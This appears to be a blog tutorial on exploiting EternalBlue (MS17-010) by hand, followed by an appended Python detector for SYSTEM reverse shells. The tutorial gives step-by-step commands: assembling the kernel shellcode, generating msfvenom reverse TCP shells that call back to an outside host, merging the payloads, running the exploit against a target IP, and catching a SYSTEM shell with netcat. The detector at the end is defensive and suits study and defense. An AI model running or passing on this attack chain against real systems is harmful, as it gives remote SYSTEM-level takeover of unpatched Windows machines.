In this post we’ll see how EternalBlue (MS17-010) can be exploited manually by compiling the payload from source and running it against a vulnerable target. This is useful in situations where Metasploit is not available or not an option, like running quick demos or exploiting from C2 hosts. Unlike “zzz_exploit”, this method does not require access to a named pipe, nor does it require any credentials. The downside is an increased risk of crashing the target, so please use it with caution. Big thanks to Worawit Wang for developing the shellcodes and making them public.
Obtaining the shellcodes
Clone the following repo to obtain the kernel shellcodes:
git clone https://github.com/worawit/MS17-010.git
Our points of interest are the shellcodes (.asm) located in MS17-010/shellcode, which we must compile in order to make them executable.
$ ls MS17-010/shellcode | grep shellcode
eternalblue_kshellcode_x64.asm
eternalblue_kshellcode_x86.asm
As you can see, there are two .asm files in this folder: one for x64 and one for x86. Which one you choose depends on the architecture of your target. If you are unsure, or if you just want a payload that works on both architectures, then I suggest compiling shellcodes for both architectures and later merging them as explained in the optional section below.
Compiling the shellcode(s)
Run the appropriate command to assemble the shellcodes with nasm:
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
Doing so will output the binary for your chosen arch, which contains everything needed to exploit the infamous vulnerability. That is great, but not very useful unless it also contains some evil code to be executed once the vulnerability itself has been exploited. This “evil code” can be any binary that you desire, provided it’s compiled for the correct architecture as well.
To accomplish that we must combine both the kernel exploit and the payload into a single binary. For the sake of this example I’ll use msfvenom to generate a simple reverse TCP shell payload.
$ msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=elliot.sh --platform windows -a x64 --format raw -o sc_x64_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Saved as: sc_x64_payload.bin
$ msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=elliot.sh --platform windows -a x86 --format raw -o sc_x86_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Saved as: sc_x86_payload.bin
By now you should have at least one *_kernel.bin and one *_payload.bin sitting in your directory. Use cat to merge them as one.
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
x64 and x86 in one binary (optional)
Provided you have compiled binaries for both architectures (and want them both in your payload) then merge them together with the included eternalblue_sc_merge.py script located in the
python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
Exploiting the target
By now you should have one binary containing both the kernel exploit and your evil payload.
To run the exploit, you must use one of the provided eternalblue_exploit scripts located in the
$ ls MS17-010 | grep eternalblue_exploit
eternalblue_exploit7.py
eternalblue_exploit8.py
To decide which script to use you must first consider the target OS. If you don’t know, then you had better be a working professional sitting in a test environment; running these blindly against a target is a bad idea. If anything, expect your target to crash or force reboot once the session is closed.
- Windows Server 2012 (x64)
- Windows 8.1 & RT
- Windows 10 (x64) (build < 14393)
- Windows Server 2008 & R2
- Windows Server 2012 & R2 (x86)
- Windows Server 2016 (x64)
- Windows Vista
- Windows 7
python MS17-010/eternalblue_exploit7.py <target_IP> final.bin
Example running against vulnerable Windows 7 host:
$ python MS17-010/eternalblue_exploit7.py 126.96.36.199 sc_all.bin
$ nc -lvnp 443
listening on [any] 443 ...
connect to [188.8.131.52] from (UNKNOWN) [184.108.40.206] 49191
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
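The session above ends in a cmd.exe shell running as nt authority\system that connected back on port 443. As an added example (not part of the original post or of the MS17-010 repo), the Python below flags that pattern in endpoint telemetry: a SYSTEM-context cmd.exe whose parent process opened an outbound connection shortly before spawning it. The event records are constructed and simplified from Sysmon Event ID 1 and 3; the dictionary keys, the 60-second window and svc_example.exe are assumptions and say nothing about which process actually hosts the payload.

```python
from datetime import datetime, timedelta

SYSTEM = "NT AUTHORITY\\SYSTEM"
WINDOW = timedelta(seconds=60)  # assumed correlation window, tune per environment
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed sample events, simplified from Sysmon Event ID 3 (network connection)
# and Event ID 1 (process creation). Hosts, PIDs, images and addresses are made up.
EVENTS = [
    {"id": 3, "time": "2024-05-01T10:00:00", "host": "WIN7-LAB", "pid": 484,
     "user": SYSTEM, "image": r"C:\Windows\System32\svc_example.exe",
     "dst": "203.0.113.10", "dport": 443},
    {"id": 1, "time": "2024-05-01T10:00:01", "host": "WIN7-LAB", "pid": 2120,
     "ppid": 484, "user": SYSTEM, "image": CMD},
    # Benign: an interactive user opens a console.
    {"id": 1, "time": "2024-05-01T10:05:00", "host": "WIN7-LAB", "pid": 3004,
     "ppid": 1800, "user": "LAB\\alice", "image": CMD},
    # Benign: SYSTEM console whose parent made no outbound connection.
    {"id": 1, "time": "2024-05-01T10:06:00", "host": "SRV02", "pid": 4100,
     "ppid": 900, "user": SYSTEM, "image": CMD},
    # Outside the window: parent connected 90 minutes before spawning cmd.exe.
    {"id": 3, "time": "2024-05-01T09:00:00", "host": "SRV02", "pid": 700,
     "user": SYSTEM, "image": r"C:\Windows\System32\svc_example.exe",
     "dst": "198.51.100.7", "dport": 443},
    {"id": 1, "time": "2024-05-01T10:30:00", "host": "SRV02", "pid": 4200,
     "ppid": 700, "user": SYSTEM, "image": CMD},
]

def find_system_reverse_shells(events, window=WINDOW):
    """Flag SYSTEM cmd.exe whose parent opened an outbound connection just before."""
    conns = {}  # (host, pid) -> outbound connections made by that SYSTEM process
    for e in events:
        if e["id"] == 3 and e["user"].upper() == SYSTEM:
            conns.setdefault((e["host"], e["pid"]), []).append(e)
    alerts = []
    for e in events:
        if e["id"] != 1 or e["user"].upper() != SYSTEM:
            continue
        if not e["image"].lower().endswith("\\cmd.exe"):
            continue
        born = datetime.fromisoformat(e["time"])
        for c in conns.get((e["host"], e["ppid"]), []):
            if timedelta(0) <= born - datetime.fromisoformat(c["time"]) <= window:
                alerts.append({"host": e["host"], "shell_pid": e["pid"],
                               "parent": c["image"], "dst": c["dst"], "dport": c["dport"]})
    return alerts

if __name__ == "__main__":
    for alert in find_system_reverse_shells(EVENTS):
        print(alert)
```

Only the first pair of events raises an alert; the user console, the SYSTEM console without a parent connection, and the stale connection are ignored.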